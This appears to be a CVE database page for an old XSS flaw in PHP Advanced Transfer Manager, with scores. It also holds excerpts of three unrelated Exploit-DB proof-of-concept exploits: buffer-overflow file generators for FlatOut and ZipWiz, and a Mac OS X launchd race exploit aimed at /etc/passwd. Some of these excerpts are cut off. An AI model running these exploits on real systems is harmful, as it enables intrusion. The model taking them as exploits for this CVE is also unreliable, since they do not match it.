CVE-2005-3000
published 2005-09-20CVE-2005-3000: Multiple cross-site scripting (XSS) vulnerabilities in viewers/txt.php in PHP Advanced Transfer Manager 1.30 allow remote attackers to inject arbitrary web…
PriorityP415medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EPSS
0.99%
58.2th percentile
Multiple cross-site scripting (XSS) vulnerabilities in viewers/txt.php in PHP Advanced Transfer Manager 1.30 allow remote attackers to inject arbitrary web script or HTML via the (1) font, (2) normalfontcolor, or (3) mess[31] parameters.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bugada_andrea | php_advanced_transfer_manager | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Bugbear FlatOut 2005 - '.bed' File Buffer Overflow
exploitdb·2011-11-30
CVE-2011-5173 Bugbear FlatOut 2005 - '.bed' File Buffer Overflow
Bugbear FlatOut 2005 - '.bed' File Buffer Overflow
---
#Exploit Title: FlatOut Malformed .bed file Buffer Overflow
# Date: 11-29-11
# Author: Silent Dream
# Software Link: http://www.gog.com/en/gamecard/flatout
# Version: Latest
# Tested on: Windows 7
#Tested on GOG.com copy of FlatOut. Exception offset = 61616161
#Multiple .bed files are vulnerable to buffer overflows...too many to even begin to list..
my $file = "playlist_0.bed";
my $head = "Title = \"";
my $junk = "a" x 3000 . "\"\r";
my $tail = "Loop = {" . "\r}";
open($File, ">$file");
print $File $head.$junk.$tail;
close($FILE);
print "Overwrite the original playlist_0.bed file in %program files%\\GOG.com\\FlatOut\\data\\music and launch flatout.exe...wait for the crash\r\n";
Exploit-DB
ZipWiz 2005 5.0 - '.zip' Buffer Corruption
exploitdb·2011-07-08
ZipWiz 2005 5.0 - '.zip' Buffer Corruption
ZipWiz 2005 5.0 - '.zip' Buffer Corruption
---
#!/usr/bin/perl
#
#[+]Exploit Title: ZipWiz 2005 v5.0 .ZIP File Buffer Corruption Exploit
#[+]Date: 08\07\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/ZipWiz-2005/3000-2250_4-10011590.html
#[+]Version: v5.0
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#
use strict;
use warnings;
my $filename = "Exploit.zip";
print "\n\n\t\tZipWiz 2005 v5.0 .ZIP File Buffer Corruption Exploit\n";
print "\t\tCreated by C4SS!0 G0M3S\n";
print "\t\tE-mail Louredo_\@hotmail.com\n";
print "\t\tSite www.exploit-br.org/\n\n";
sleep(1);
my $head = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";
my $head2 = "\x50\x4B\x01\x02
Exploit-DB
Apple Mac OSX 10.4 - launchd Race Condition
exploitdb·2005-06-14
CVE-2005-1725 Apple Mac OSX 10.4 - launchd Race Condition
Apple Mac OSX 10.4 - launchd Race Condition
---
/*
* Mac OS X 10.4 launchd race condition exploit
*
* intropy (intropy caughq.org)
*/
/* .sh script to help with the offsets /str0ke
#!/bin/bash
X=1000
Y=3000
I=1
while ((1))
do
./CAU-launchd /etc/passwd $X
if [ $I -lt 30 ]
then
((X=$X+$Y))
((I=$I+1))
else
X=1000
I=1
fi
done
*/
#include
#include
#include
#include
#include
#include
#define DEBUG 0
#define SLEEP 6000
main(int argc, char *argv[])
{
pid_t pid;
int count, sleep = SLEEP;
char name[100];
char target[100];
struct stat *stats = (struct stat *)malloc(sizeof(struct stat));
if ( argc \n", argv[0]);
exit(-1);
} else if ( argc > 2 ) {
sleep = atoi(argv[2]);
strncpy(target, argv[1], sizeof(target)-1);
} else {
strncpy(target, argv[1], sizeof(target)-1);
}
if ( DEBUG ) printf("Goin
No writeups or analysis indexed.
2005-09-20
Published